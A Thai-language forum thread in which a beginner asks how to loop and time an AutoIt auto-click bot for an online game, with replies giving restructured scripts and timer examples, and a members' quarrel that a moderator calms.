ฟอรั่มของบล็อก http://pssix.blogspot.com


เพิ่งศึกษาเขียนบอทออโต้คลิกครับ มีเรื่องจะถามหน่อยครับ

Share

ibana666
สมาชิกทั่วไป
สมาชิกทั่วไป


จำนวนข้อความ : 18
ความนิยม : 0
เข้าร่วมเมื่อ : 29/05/2011

เพิ่งศึกษาเขียนบอทออโต้คลิกครับ มีเรื่องจะถามหน่อยครับ

ตั้งหัวข้อ by ibana666 on 02/06/11, 11:21 pm

ผมเพิ่งลองเขียนบอทAutoitเป็นครั้งแรกครับ (ศึกษาจากบอร์ดนี้เลย)
ผมมีปัญหาเรื่องเขียนบอทแบบลูบวนครับ อ่านจากในบอร์ดแล้วเห็นเค้าว่าถ้าเราเขียนบอทเป็นคำสั่งยาวๆมากๆ
แล้วจะทำให้การทำงานโปรแกรมที่เขียนช้าลง ผมเลยอยากจะถามพี่ๆว่าถ้าจะเขียนบอทแบบเป็นลูบ
แบบสั่งทำซ้ำๆเฉพาะคำสั่งที่ต้องการ แล้วตั้งเวลาให้ทำคำสั่งอีกอย่าง จะต้องเขียนแบบไหนอะครับ
ผมโพสบอทคลิ๊กที่ผมเขียน(ดัดแปลงจากเค้ามา) ที่จริงมันยาวกว่านี้มากๆครับ เพราะผมเขียนแบบวนลูบไม่เป็น
พี่ๆช่วยเขียนเป็นแนวทางให้ผมได้ไหมครับ เพื่อเป็นแนวทางการเขียนโปรแกรมของผมต่อไป

ขอบคุณล่วงหน้าครับผมem234 em234 em234


Send("{Enter}")
Send("/request off") ----------------------l>น้ำเงิน "เริ่มทำครั้งแรกตอนกดเริ่มบอทครั้งเดียว"
Send("{Enter}")


Send("{Space}")
Send("{q}") ----------------------------------- คำสั่งแดง "ใช้คำสั่งแบบวนซ้ำไปเรื่อยๆ"
MouseClick("right",977,148,50)



ข้างล่างนี้ตั้งเวลา ครึ่งชม.ทำ1ครั้ง

Sleep(1500)
Send("{r}")
Sleep(1500)
MouseClick("left", 787, 276, 2,5000000) ; ซ่อมดาบ
Sleep(500)
MouseClick("left", 820, 270, 2,5000000) ; ซ่อมสร้อย
Sleep(500)
MouseClick("left", 816, 341, 2,5000000) ; ซ่อมแหวน1
Sleep(500)
MouseClick("left", 892, 342, 2,5000000) ; ซ่อมแหวน2
Sleep(500)
MouseClick("left", 910, 216, 2,5000000) ; ซ่อมปีก
Sleep(1500)
Send("{r}")
Sleep(1500)


ข้างล่างนี้ตั้งเวลา ครึ่งชม.ทำ1ครั้ง

MouseClick("left", 945, 408,1,5000000) ;
Sleep(500)
MouseClick("left", 698, 689,1,5000000) ; drop
Sleep(500)
MouseClick("left", 920, 408,1,5000000) ;
Sleep(500)
MouseClick("left", 698, 689,1,5000000) ; drop
Sleep(500)
MouseClick("left", 896, 408,1,5000000) ;
Sleep(500)
MouseClick("left", 698, 689,1,5000000) ; drop
Sleep(500)
MouseClick("left", 870, 408,1,5000000) ;
Sleep(500)
MouseClick("left", 698, 689,1,5000000) ; drop
Sleep(500)
MouseClick("left", 847, 408,1,5000000) ;
Sleep(500)
MouseClick("left", 698, 689,1,5000000) ; drop
Sleep(500)
MouseClick("left", 820, 408,1,5000000) ;
Sleep(500)
MouseClick("left", 698, 689,1,5000000) ; drop
Sleep(500)

เสร็จแล้ววนกลับไปรันที่คำสั่งสีแดงใหม่

avatar
flapjack
PSsix Member Super Class III
PSsix Member Super Class III

PSsix Moderator PSsix Master PSsix Game Coder
จำนวนข้อความ : 313
ความนิยม : 75
เข้าร่วมเมื่อ : 05/10/2010

Re: เพิ่งศึกษาเขียนบอทออโต้คลิกครับ มีเรื่องจะถามหน่อยครับ

ตั้งหัวข้อ by flapjack on 03/06/11, 07:34 am

วิธีการจะคล้ายๆของ คุณ อัต เลยครับ
[You must be registered and logged in to see this link.] em230
แต่ Codeของคุณ อัต
ตรงบรรทัด
AdlibRegister("buff", 200)<----(ผมไม่รู้ว่าคืออะไร ลองRUNแล้วมันError)
ถ้าจากนั้นก็ใส่ ลูปซ่อนอีกที (ถ้าจะให้วน อ่าน่ะ แต่มันจะไปลูปในฟังชั่นอย่างเดียวหรือเปล่า เพราะผมยังไม่ได้เอาลองตัว code ของผมเลย(เขียนยาวมากๆ))

ถ้าให้ดีรอผู้รู้มาตอบอีกทีครับ ชินจัง


avatar
newsak2005
ระงับสมาชิก
ระงับสมาชิก


จำนวนข้อความ : 115
ความนิยม : 0
เข้าร่วมเมื่อ : 08/05/2011

Re: เพิ่งศึกษาเขียนบอทออโต้คลิกครับ มีเรื่องจะถามหน่อยครับ

ตั้งหัวข้อ by newsak2005 on 03/06/11, 11:45 am

ลองศึกษา-ค้นคว้า-ทดลอง เกี่ยวกับคำสั่งเหล่านี้ดู

TimerIint, TimerDiff, Sleep, AdlibRegister, AdlibUnRegister

While Wend, Do Until, For Next, For In Next, Array, WinAPI

ผมไม่กล้าลงตัวอย่างโค๊ดให้ดู เพราะมีคนคอยจ้องดักแทงข้างหลังอยู่
avatar
newsak2005
ระงับสมาชิก
ระงับสมาชิก


จำนวนข้อความ : 115
ความนิยม : 0
เข้าร่วมเมื่อ : 08/05/2011

Re: เพิ่งศึกษาเขียนบอทออโต้คลิกครับ มีเรื่องจะถามหน่อยครับ

ตั้งหัวข้อ by newsak2005 on 03/06/11, 12:12 pm

การใช้งานคำสั่งวนลูป ใช้ได้กับคำสั่งเดิมๆที่ต้องการให้ทำซ้ำๆ

แต่ถ้าเปลี่ยนเป็นคำสั่งใหม่ในคำสั่งเดิมเมื่อไหร่ ก็ต้องมาเริ่มเขียนคำสั่งวนลูปกันใหม่

หรือไม่ก็ใช้วิธีกระโดดข้าม (ContinueLoop) หรือหยุดLoop,Plause (ExitLoop, $i=$i)

ibana666
สมาชิกทั่วไป
สมาชิกทั่วไป


จำนวนข้อความ : 18
ความนิยม : 0
เข้าร่วมเมื่อ : 29/05/2011

Re: เพิ่งศึกษาเขียนบอทออโต้คลิกครับ มีเรื่องจะถามหน่อยครับ

ตั้งหัวข้อ by ibana666 on 03/06/11, 12:17 pm

ขอบคุณสำหรับความรู้ครับ

ผมมีคำถามมาถามเพิ่มคือ

อยากเขียนบอทให้มันรันเฉพาะในตัวเกมส์ได้ไหมครับ

อย่าง สั่งให้ในเกมส์ คลิกขวา(ใช้สกิล)ตลอดเวลา ถึงเราจะพับจอก็ยังทำอยู่ เหมือนกับสั่งเม้าท์แยกไปกดต่างหากอะครับ

เพื่อจะได้บอทไปด้วย แล้วทำงานอย่างอื่นไปด้วย ภายนอกหน้าจอเกมส์อะครับไม่เอาบอทมากดข้างนอกด้วยอะครับ

ขอบคุณครับ em218
avatar
อัต
PSsix Member Class III
PSsix Member Class III


จำนวนข้อความ : 54
ความนิยม : 9
เข้าร่วมเมื่อ : 07/05/2011

Re: เพิ่งศึกษาเขียนบอทออโต้คลิกครับ มีเรื่องจะถามหน่อยครับ

ตั้งหัวข้อ by อัต on 03/06/11, 02:38 pm

จัดให้ตามคำขอ นายระวังให้ดีนะแถวนี้มีพวกกากชอบใช้โปรแกรมแปลautoitอังกิดเป็นไทยแล้วมาสอนคนอื่นจิงจิงมานไม่ได้รู้อะไรจิงเลยสักอย่างเด๋ว ชอบทำอมพูมเป็นเก่งที่แท้ก้อกากดีดีนั่นเองเหอๆ ระวังหน่อยนะมานหลอกคนมานานมากแย้วที่อื่นเขาร่วมกันแฉความกากของมานจนมานหนีมาแถวนี้เด๋วเราก้อจะหาคนช่วยกันไล่มานบ้างที่อื่นยังทำสำเร็ดที่นี่ก้อจะทำให้สำเร็ด

$oiio = "no"

AdlibRegister("buff", 1000 * 30)

While 1
If $oiio = "no" Then
Send("{Enter}")
Send("/request off")
Send("{Enter}")
$oiio = "yes"
Else
While 1
Send("{Space}")
Send("{q}")
MouseClick("right", 977, 148, 50)
Sleep(100)
WEnd
EndIf
WEnd


Func buff()
Sleep(1500)
Send("{r}")
Sleep(1500)
MouseClick("left", 787, 276, 2, 5000000) ; ซ่อมดาบ
Sleep(500)
MouseClick("left", 820, 270, 2, 5000000) ; ซ่อมสร้อย
Sleep(500)
MouseClick("left", 816, 341, 2, 5000000) ; ซ่อมแหวน1
Sleep(500)
MouseClick("left", 892, 342, 2, 5000000) ; ซ่อมแหวน2
Sleep(500)
MouseClick("left", 910, 216, 2, 5000000) ; ซ่อมปีก
Sleep(1500)
Send("{r}")
Sleep(1500)

MouseClick("left", 945, 408, 1, 5000000) ;
Sleep(500)
MouseClick("left", 698, 689, 1, 5000000) ; drop
Sleep(500)
MouseClick("left", 920, 408, 1, 5000000) ;
Sleep(500)
MouseClick("left", 698, 689, 1, 5000000) ; drop
Sleep(500)
MouseClick("left", 896, 408, 1, 5000000) ;
Sleep(500)
MouseClick("left", 698, 689, 1, 5000000) ; drop
Sleep(500)
MouseClick("left", 870, 408, 1, 5000000) ;
Sleep(500)
MouseClick("left", 698, 689, 1, 5000000) ; drop
Sleep(500)
MouseClick("left", 847, 408, 1, 5000000) ;
Sleep(500)
MouseClick("left", 698, 689, 1, 5000000) ; drop
Sleep(500)
MouseClick("left", 820, 408, 1, 5000000) ;
Sleep(500)
MouseClick("left", 698, 689, 1, 5000000) ; drop
Sleep(500)
EndFunc
avatar
อัต
PSsix Member Class III
PSsix Member Class III


จำนวนข้อความ : 54
ความนิยม : 9
เข้าร่วมเมื่อ : 07/05/2011

Re: เพิ่งศึกษาเขียนบอทออโต้คลิกครับ มีเรื่องจะถามหน่อยครับ

ตั้งหัวข้อ by อัต on 03/06/11, 02:40 pm

อ้อ....นายมีคำสั่งอันนุงที่นายเขียนผิดลองหาดูหาไม่ได้เด๋วมาฉเลย
avatar
rolovely
PSsix Member Super Class II
PSsix Member Super Class II

PSsix Game Coder
จำนวนข้อความ : 193
ความนิยม : 25
เข้าร่วมเมื่อ : 15/10/2010
อายุ : 29
ที่อยู่ : THAILAND

Re: เพิ่งศึกษาเขียนบอทออโต้คลิกครับ มีเรื่องจะถามหน่อยครับ

ตั้งหัวข้อ by rolovely on 03/06/11, 08:59 pm

ibana666 พิมพ์ว่า:ขอบคุณสำหรับความรู้ครับ

ผมมีคำถามมาถามเพิ่มคือ

อยากเขียนบอทให้มันรันเฉพาะในตัวเกมส์ได้ไหมครับ

อย่าง สั่งให้ในเกมส์ คลิกขวา(ใช้สกิล)ตลอดเวลา ถึงเราจะพับจอก็ยังทำอยู่ เหมือนกับสั่งเม้าท์แยกไปกดต่างหากอะครับ

เพื่อจะได้บอทไปด้วย แล้วทำงานอย่างอื่นไปด้วย ภายนอกหน้าจอเกมส์อะครับไม่เอาบอทมากดข้างนอกด้วยอะครับ

ขอบคุณครับ em218

ใช้การอ่านรหัสของ harddisk เอาก็ได้ครับ เดี่ยวจะเอามาลงให้ดู

ibana666
สมาชิกทั่วไป
สมาชิกทั่วไป


จำนวนข้อความ : 18
ความนิยม : 0
เข้าร่วมเมื่อ : 29/05/2011

Re: เพิ่งศึกษาเขียนบอทออโต้คลิกครับ มีเรื่องจะถามหน่อยครับ

ตั้งหัวข้อ by ibana666 on 03/06/11, 09:25 pm

คำสั่งไหนหรอครับ หรือว่าเป้นตรง สีแดง
MouseClick("left", 698, 689,1,5000000) ; drop

ที่มันเยอะไปทำให้ทำงานผิดพลาดหรอครับ

ขอบคุณครับสำหรับโค้ด :lol!:

ibana666
สมาชิกทั่วไป
สมาชิกทั่วไป


จำนวนข้อความ : 18
ความนิยม : 0
เข้าร่วมเมื่อ : 29/05/2011

Re: เพิ่งศึกษาเขียนบอทออโต้คลิกครับ มีเรื่องจะถามหน่อยครับ

ตั้งหัวข้อ by ibana666 on 03/06/11, 09:33 pm

rolovely พิมพ์ว่า:
ibana666 พิมพ์ว่า:ขอบคุณสำหรับความรู้ครับ

ผมมีคำถามมาถามเพิ่มคือ

อยากเขียนบอทให้มันรันเฉพาะในตัวเกมส์ได้ไหมครับ

อย่าง สั่งให้ในเกมส์ คลิกขวา(ใช้สกิล)ตลอดเวลา ถึงเราจะพับจอก็ยังทำอยู่ เหมือนกับสั่งเม้าท์แยกไปกดต่างหากอะครับ

เพื่อจะได้บอทไปด้วย แล้วทำงานอย่างอื่นไปด้วย ภายนอกหน้าจอเกมส์อะครับไม่เอาบอทมากดข้างนอกด้วยอะครับ

ขอบคุณครับ em218

ใช้การอ่านรหัสของ harddisk เอาก็ได้ครับ เดี่ยวจะเอามาลงให้ดู

ขอบคุณคับ em230
avatar
อัต
PSsix Member Class III
PSsix Member Class III


จำนวนข้อความ : 54
ความนิยม : 9
เข้าร่วมเมื่อ : 07/05/2011

Re: เพิ่งศึกษาเขียนบอทออโต้คลิกครับ มีเรื่องจะถามหน่อยครับ

ตั้งหัวข้อ by อัต on 03/06/11, 10:01 pm

ถ...ถูกต้องนะค๊าาบบบบบบอันสุดท้ายมันตั้งได้ 0-100 นะนาย 0 เร็วจัด 100 ช้าจัด



ibana666 พิมพ์ว่า:คำสั่งไหนหรอครับ หรือว่าเป้นตรง สีแดง
MouseClick("left", 698, 689,1,5000000) ; drop

ที่มันเยอะไปทำให้ทำงานผิดพลาดหรอครับ

ขอบคุณครับสำหรับโค้ด :lol!:
avatar
อัต
PSsix Member Class III
PSsix Member Class III


จำนวนข้อความ : 54
ความนิยม : 9
เข้าร่วมเมื่อ : 07/05/2011

Re: เพิ่งศึกษาเขียนบอทออโต้คลิกครับ มีเรื่องจะถามหน่อยครับ

ตั้งหัวข้อ by อัต on 03/06/11, 10:03 pm

นายเปลี่ยนโคดอันนี้ด้วย AdlibRegister("buff", 1000 * 30) อันนี้เป็น 30 วิเปี่ยนเป็น AdlibRegister("buff", 1000 * 60*30) ก้อจะได้ 30 นาที

ชินจัง3

ibana666
สมาชิกทั่วไป
สมาชิกทั่วไป


จำนวนข้อความ : 18
ความนิยม : 0
เข้าร่วมเมื่อ : 29/05/2011

Re: เพิ่งศึกษาเขียนบอทออโต้คลิกครับ มีเรื่องจะถามหน่อยครับ

ตั้งหัวข้อ by ibana666 on 03/06/11, 10:11 pm

อัต พิมพ์ว่า:จัดให้ตามคำขอ นายระวังให้ดีนะแถวนี้มีพวกกากชอบใช้โปรแกรมแปลautoitอังกิดเป็นไทยแล้วมาสอนคนอื่นจิงจิงมานไม่ได้รู้อะไรจิงเลยสักอย่างเด๋ว ชอบทำอมพูมเป็นเก่งที่แท้ก้อกากดีดีนั่นเองเหอๆ ระวังหน่อยนะมานหลอกคนมานานมากแย้วที่อื่นเขาร่วมกันแฉความกากของมานจนมานหนีมาแถวนี้เด๋วเราก้อจะหาคนช่วยกันไล่มานบ้างที่อื่นยังทำสำเร็ดที่นี่ก้อจะทำให้สำเร็ด

$oiio = "no"

AdlibRegister("buff", 1000 * 30)

While 1
If $oiio = "no" Then
Send("{Enter}")
Send("/request off")
Send("{Enter}")
$oiio = "yes"
Else
While 1
Send("{Space}")
Send("{q}")
MouseClick("right", 977, 148, 50)
Sleep(100)

WEnd
EndIf
WEnd


Func buff()
Sleep(1500)
Send("{r}")
Sleep(1500)
MouseClick("left", 787, 276, 2, 5000000) ; ซ่อมดาบ
Sleep(500)
MouseClick("left", 820, 270, 2, 5000000) ; ซ่อมสร้อย
Sleep(500)
MouseClick("left", 816, 341, 2, 5000000) ; ซ่อมแหวน1
Sleep(500)
MouseClick("left", 892, 342, 2, 5000000) ; ซ่อมแหวน2
Sleep(500)
MouseClick("left", 910, 216, 2, 5000000) ; ซ่อมปีก
Sleep(1500)
Send("{r}")
Sleep(1500)

MouseClick("left", 945, 408, 1, 5000000) ;
Sleep(500)
MouseClick("left", 698, 689, 1, 5000000) ; drop
Sleep(500)
MouseClick("left", 920, 408, 1, 5000000) ;
Sleep(500)
MouseClick("left", 698, 689, 1, 5000000) ; drop
Sleep(500)
MouseClick("left", 896, 408, 1, 5000000) ;
Sleep(500)
MouseClick("left", 698, 689, 1, 5000000) ; drop
Sleep(500)
MouseClick("left", 870, 408, 1, 5000000) ;
Sleep(500)
MouseClick("left", 698, 689, 1, 5000000) ; drop
Sleep(500)
MouseClick("left", 847, 408, 1, 5000000) ;
Sleep(500)
MouseClick("left", 698, 689, 1, 5000000) ; drop
Sleep(500)
MouseClick("left", 820, 408, 1, 5000000) ;
Sleep(500)
MouseClick("left", 698, 689, 1, 5000000) ; drop
Sleep(500)
EndFunc


ผมลองใช้งานดูครับ แต่มันไม่วนไปบอทอะครับ คือมันรันมาตั้งแต่ต้น แต่พอจบบรรทัดสุดท้ายแทนที่จะวนไปบอทตรงสีแดง

มันกลับไปวนตรงสีเขียวแทนอะครับ มันวนแต่ตรงสีเขียว ผมอยากให้มันบอทตรงสีแดงเป็นหลักแล้ว 30นาทีถึงมาทำตรงbuffน่ะครับ

ibana666
สมาชิกทั่วไป
สมาชิกทั่วไป


จำนวนข้อความ : 18
ความนิยม : 0
เข้าร่วมเมื่อ : 29/05/2011

Re: เพิ่งศึกษาเขียนบอทออโต้คลิกครับ มีเรื่องจะถามหน่อยครับ

ตั้งหัวข้อ by ibana666 on 03/06/11, 11:36 pm

ล่าสุด สำเร็จแล้วครับ วนลูปตามที่คิดไว้แล้วครับ

มีคำถามเพิ่มที่ค้างคาไว้คับ

ผมมีคำถามมาถามเพิ่มคือ

อยากเขียนบอทให้มันรันเฉพาะในตัวเกมส์ได้ไหมครับ

อย่าง สั่งให้ในเกมส์ คลิกขวา(ใช้สกิล)ตลอดเวลา ถึงเราจะพับจอก็ยังทำอยู่ เหมือนกับสั่งเม้าท์แยกไปกดต่างหากอะครับ

เพื่อจะได้บอทไปด้วย แล้วทำงานอย่างอื่นไปด้วย ภายนอกหน้าจอเกมส์อะครับไม่เอาบอทมากดข้างนอกด้วยอะครับ

ขอบคุณมากๆครับ ทุกความเห็น ทุกข้อมูล em218
avatar
newsak2005
ระงับสมาชิก
ระงับสมาชิก


จำนวนข้อความ : 115
ความนิยม : 0
เข้าร่วมเมื่อ : 08/05/2011

Re: เพิ่งศึกษาเขียนบอทออโต้คลิกครับ มีเรื่องจะถามหน่อยครับ

ตั้งหัวข้อ by newsak2005 on 04/06/11, 05:35 am

AdlibRegister คือคำสั่งที่ติดต่อใช้งานคำสั่งWindows ที่เกี่ยวข้องกับเวลา

ซึ่งต้องเขียนคำสั่ง: AutoIt ออกมาเป็นรูปแบบฟังก์ชั่น

ต้องทดลองฝึกเขียนคำสั่งในรูปแบบต่างๆเอง

ถึงจะรู้ว่ามันทำงานยังไง? หมูมาก คำสั่งพื้นๆ ง่ายจะตาย.

เมื่อก่อนคำสั่งจะใช้เป็น AdlibEnable คำสั่งนี้ใช้ได้กับ AutoIt v2.xx เท่านั้น

ถ้านำมาใช้กับ v3.xx จะเกิด Error! (บอกเล่าจากประสบการณ์)
------------------------------------------------------------------------------------------------------
Code:
#Include <Misc.au3>

$hGUI = GUICreate("MyGUI")
GUISetState()

AdlibRegister("MyAdlib", 3000)

Do
Until GUIGetMsg() = -3

Func MyAdlib()
  MsgBox(0, "", "Test", 1, $hGUI)
  ;AdlibUnRegister("MyAdlib") ;If use this command will one process.
EndFunc

อธิบาย:

"MyAdlib" หมายถึง ชื่ออะไรก็ได้ ที่เรากำหนดให้เป็นชื่อของฟังก์ชั่น

3000 หมายถึง เวลาที่เรากำหนดให้สิ่งที่เราใส่ไว้ในฟังก์ชั่น ลุกขึ้นมาทำงานทุกๆ 3 วินาที

หรือเรียกง่ายๆว่า เมื่อทำงานแล้ว หน่วงเวลาไว้ 3 วินาที แล้วค่อยเริ่มทำใหม่อีกครั้ง.
avatar
อัต
PSsix Member Class III
PSsix Member Class III


จำนวนข้อความ : 54
ความนิยม : 9
เข้าร่วมเมื่อ : 07/05/2011

Re: เพิ่งศึกษาเขียนบอทออโต้คลิกครับ มีเรื่องจะถามหน่อยครับ

ตั้งหัวข้อ by อัต on 04/06/11, 07:24 am

newsak2005 พิมพ์ว่า:ลองศึกษา-ค้นคว้า-ทดลอง เกี่ยวกับคำสั่งเหล่านี้ดู

TimerIint, TimerDiff, Sleep, AdlibRegister, AdlibUnRegister

While Wend, Do Until, For Next, For In Next, Array, WinAPI

ผมไม่กล้าลงตัวอย่างโค๊ดให้ดู เพราะมีคนคอยจ้องดักแทงข้างหลังอยู่

เฮ้อ..... เบื่อยามเช้า...เขียนเองไม่ได้ก้อไปไกลเลยเหอเหอดูมันตอบเล่นเอาคำสังมัวซัวกะว่านแหว่าใส่คำสังมาเยอะๆ กะว่าคงมีสักอันทายถูกหรา TimerIint, TimerDiff WinAPI(ContinueLoop) Loop,Plause (ExitLoop, $i=$i) แนะนำเอามาทำไร่อ้อยไร ไม่กล้าเขียนหรือเขียนไม่ได้กันแน่

newsak2005 พิมพ์ว่า:การใช้งานคำสั่งวนลูป ใช้ได้กับคำสั่งเดิมๆที่ต้องการให้ทำซ้ำๆ

แต่ถ้าเปลี่ยนเป็นคำสั่งใหม่ในคำสั่งเดิมเมื่อไหร่ ก็ต้องมาเริ่มเขียนคำสั่งวนลูปกันใหม่

หรือไม่ก็ใช้วิธีกระโดดข้าม (ContinueLoop) หรือหยุดLoop,Plause (ExitLoop, $i=$i)

รู้ไหมทำไมเราไม่เขียนลูบกดเม้าเพราะรู้ว่านายต้องเจ๋อเข้ามามัวอีกหลังเราลงโค้ดอันแรก แล้วมันก็มาจิงจิงทายผิดซะเมื่อไหร่เอ้าแสดงความเก่งโชหน่อยมามะ มาเขียนลูบให้มันกดเม้าเอาแบบสั้นนะนายไม่ใช่เขียนแล้วยาวกว่าเดิม เขียนไม่ได้ก้อบอกมา...มีความเป็นลูกผู้ชายอะเป่า ยอมรับความจิงซะบ้างอยู่แต่ในโลกความฝันเหอเหอ

newsak2005 พิมพ์ว่า:AdlibRegister คือคำสั่งที่ติดต่อใช้งานคำสั่งWindows ที่เกี่ยวข้องกับเวลา

ซึ่งต้องเขียนคำสั่ง: AutoIt ออกมาเป็นรูปแบบฟังก์ชั่น

ต้องทดลองฝึกเขียนคำสั่งในรูปแบบต่างๆเอง

ถึงจะรู้ว่ามันทำงานยังไง? หมูมาก คำสั่งพื้นๆ ง่ายจะตาย.

เมื่อก่อนคำสั่งจะใช้เป็น AdlibEnable คำสั่งนี้ใช้ได้กับ AutoIt v2.xx เท่านั้น

ถ้านำมาใช้กับ v3.xx จะเกิด Error! (บอกเล่าจากประสบการณ์)
------------------------------------------------------------------------------------------------------
Code:
#Include <Misc.au3>

$hGUI = GUICreate("MyGUI")
GUISetState()

AdlibRegister("MyAdlib", 3000)

Do
Until GUIGetMsg() = -3

Func MyAdlib()
  MsgBox(0, "", "Test", 1, $hGUI)
  ;AdlibUnRegister("MyAdlib") ;If use this command will one process.
EndFunc

อธิบาย:

"MyAdlib" หมายถึง ชื่ออะไรก็ได้ ที่เรากำหนดให้เป็นชื่อของฟังก์ชั่น

3000 หมายถึง เวลาที่เรากำหนดให้สิ่งที่เราใส่ไว้ในฟังก์ชั่น ลุกขึ้นมาทำงานทุกๆ 3 วินาที

หรือเรียกง่ายๆว่า เมื่อทำงานแล้ว หน่วงเวลาไว้ 3 วินาที แล้วค่อยเริ่มทำใหม่อีกครั้ง.

-----------------------------------------------------------------------------------------------------------คุณอัตพูดคุยกันเรื่องสคริปต์ได้นะครับ แต่ข้อความต่อว่ากันผมขอลบทิ้ง เพราะไม่มีประโยชน์และจะชวนทะเลาะกันเสียเปล่าๆ ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-
avatar
newsak2005
ระงับสมาชิก
ระงับสมาชิก


จำนวนข้อความ : 115
ความนิยม : 0
เข้าร่วมเมื่อ : 08/05/2011

Re: เพิ่งศึกษาเขียนบอทออโต้คลิกครับ มีเรื่องจะถามหน่อยครับ

ตั้งหัวข้อ by newsak2005 on 04/06/11, 09:00 am

เกรงใจท่านPos+เสียดายเวลาที่จะพูด----------ลบ---------------

เข้าไปคุยกับคนไหนไม่ได้เลย ใครล้มมันเหยียบซ้ำทันที

่ท่านPosเห็นว่า ผมเข้าไปคุยกับใครไม่ได้ ท่านโพสท์ก็ล๊อคกระทู้นี้

ผมจะได้รู้ จะไม่ไปคุยแสดงความคิดเห็นกับใครอีก

คุณPosครับ ผมพยายามไม่ไปเอ่ยถึงใครแล้วนะครับ กรุณาอย่าล๊อคกระทู้

แต่มีคนมาบอกว่าผมมั่วอะไร? ตรงไหน? แล้วก็ไม่อธิบายหรือชี้แจงว่ามั่วตรงไหน? อย่างไร?

ผมจะได้แก้ไขเสียให้ถูกต้อง หรือท่านคิดว่าผมเป็นคนอย่างไร? มีเหตุมีผลหรือไม่?

--------------ข้อความที่ท้าทาย หรือทำให้อีกฝ่ายโกรธขอให้ละเว้นไว้ครับ คุยกันเรื่องสคริปต์ --------------------------------------------------------------------------------
มีสิทธิ์ที่จะโพสท์โค๊ดให้ความรู้ ใครก็ห้ามไม่ได้ ถึงจะไม่เกี่ยวกับการโกงเกมส์

Code:
#Include <Misc.au3>

$hGUI = GUICreate("MyGUI")
GUISetState()
$pid = Run("Notepad.exe")
WinWaitActive("[Class:Notepad]")

AdlibRegister("MyAdlib", 2000)

Do
ControlGetHandle("[Class:Notepad]", "", "Edit1") ;Auto save.
If Not ProcessExists($pid)Then WinClose("MyGUI") ;Auto exit.
Until GUIGetMsg() = -3

Func MyAdlib()
Send("123"&@LF)
Send("456"&@LF)
Send("789"&@LF)
ControlSend("[Class:Notepad]", "", "Edit1", "123456789"&@LF)
EndFunc
avatar
POS
PSsix
PSsix


จำนวนข้อความ : 1152
ความนิยม : 323
เข้าร่วมเมื่อ : 19/07/2010

Re: เพิ่งศึกษาเขียนบอทออโต้คลิกครับ มีเรื่องจะถามหน่อยครับ

ตั้งหัวข้อ by POS on 04/06/11, 10:09 am

อย่างไรก็ตาม ถ้าเห็นว่าเริ่มทะเลาะหนักขึ้น ผมก็ขอล็อกกระทู้เอาไว้

เรื่องที่ถกเถียงกันถ้าเกี่ยวกับเรื่องสคริปต์นั้นทำได้ เพราะตรงนี้เป็นฟอรั่มเกี่ยวกับสคริปต์ถูกบ้างผิดบ้างก็ค่อยพูดจากัน ขอให้ลดคำหยาบลงก็ไม่น่าจะมีปัญหาแล้ว (ถ้าไม่เขียนยัวยุกันจะดีมาก)

หมายเหตุ
ผมได้เคยคุยทาง PM กับคุณอัตขอไม่ให้เข้าไปโฟสในกระทู้ที่คุณ Sak ตั้งไว้อีก ซึ่งข้อนี้ผมก็เห็นว่าคุณอัตรับปากและทำตาม แจ้งให้ทราบเพราะเห็นว่าต่างคนต่างตอบ ให้สมาชิกท่านอื่นทดสอบทดลองสคริปต์ ก็จะไม่ต้องต่อว่ากันอีก


||----------------------------------------------------------------------------------------------------------------||

กลุ่ม AutoIt ในเฟสบุ๊ค
[You must be registered and logged in to see this link.]

++++++++++++++++++++++++++++++++++++++++++++
[You must be registered and logged in to see this link.]
[You must be registered and logged in to see this link.]
avatar
newsak2005
ระงับสมาชิก
ระงับสมาชิก


จำนวนข้อความ : 115
ความนิยม : 0
เข้าร่วมเมื่อ : 08/05/2011

Re: เพิ่งศึกษาเขียนบอทออโต้คลิกครับ มีเรื่องจะถามหน่อยครับ

ตั้งหัวข้อ by newsak2005 on 04/06/11, 05:02 pm

POS พิมพ์ว่า:อย่างไรก็ตาม ถ้าเห็นว่าเริ่มทะเลาะหนักขึ้น ผมก็ขอล็อกกระทู้เอาไว้

เรื่องที่ถกเถียงกันถ้าเกี่ยวกับเรื่องสคริปต์นั้นทำได้ เพราะตรงนี้เป็นฟอรั่มเกี่ยวกับสคริปต์ถูกบ้างผิดบ้างก็ค่อยพูดจากัน ขอให้ลดคำหยาบลงก็ไม่น่าจะมีปัญหาแล้ว (ถ้าไม่เขียนยัวยุกันจะดีมาก)

หมายเหตุ
ผมได้เคยคุยทาง PM กับคุณอัตขอไม่ให้เข้าไปโฟสในกระทู้ที่คุณ Sak ตั้งไว้อีก ซึ่งข้อนี้ผมก็เห็นว่าคุณอัตรับปากและทำตาม แจ้งให้ทราบเพราะเห็นว่าต่างคนต่างตอบ ให้สมาชิกท่านอื่นทดสอบทดลองสคริปต์ ก็จะไม่ต้องต่อว่ากันอีก

ขอบคุณท่านPos แอดมินใจดีเป็นอย่างสูง ผมจะได้มีพื้นที่แสดงความคิดเห็นกับเขาบ้าง

ถ้าผมโพสท์ข้อความที่ไม่เกี่ยวข้องกับการให้ความรู้ตรงไหน ปกติท่านสามารถลบออกได้โดยไม่มีเงื่อนไขใดๆอยู่แล้ว.
avatar
newsak2005
ระงับสมาชิก
ระงับสมาชิก


จำนวนข้อความ : 115
ความนิยม : 0
เข้าร่วมเมื่อ : 08/05/2011

Re: เพิ่งศึกษาเขียนบอทออโต้คลิกครับ มีเรื่องจะถามหน่อยครับ

ตั้งหัวข้อ by newsak2005 on 04/06/11, 05:14 pm

ท่านPosครับผมขออนุญาติถกเถียงเรื่องสคริ๊ป(ซึ่งไม่ผิดกติกามารยาท)
กับขอความข้างบนที่มีคนมาถามไว้หน่อยนะครับ เขาจะได้หายข้องใจ
--------------------------------------------------------------------------
เฮ้อ..... เบื่อยามเช้า...เขียนเองไม่ได้ก้อไปไกลเลยเหอเหอดูมันตอบเล่นเอาคำสังมัวซัว กะว่านแหว่าใส่คำสังมาเยอะๆ กะว่าคงมีสักอันทายถูกหรา TimerIint, TimerDiff WinAPI(ContinueLoop) Loop,Plause (ExitLoop, $i=$i) แนะนำเอามาทำไร่อ้อยไร ไม่กล้าเขียนหรือเขียนไม่ได้กันแน่

ถ้าเขียนเองไม่ได้ คงจะไม่กล้าลงคำสั่งมาให้ดู

เจตนาที่ไม่เขียนโค๊ดตัวอย่างลงมาให้ดู

ก็เพราะว่าอยากให้ผู้ที่เริ่มต้นหัดเขียนคำสั่ง AutoIt (ซึ่งไม่ใช่นาย) คิดเองเขียนเองบ้าง

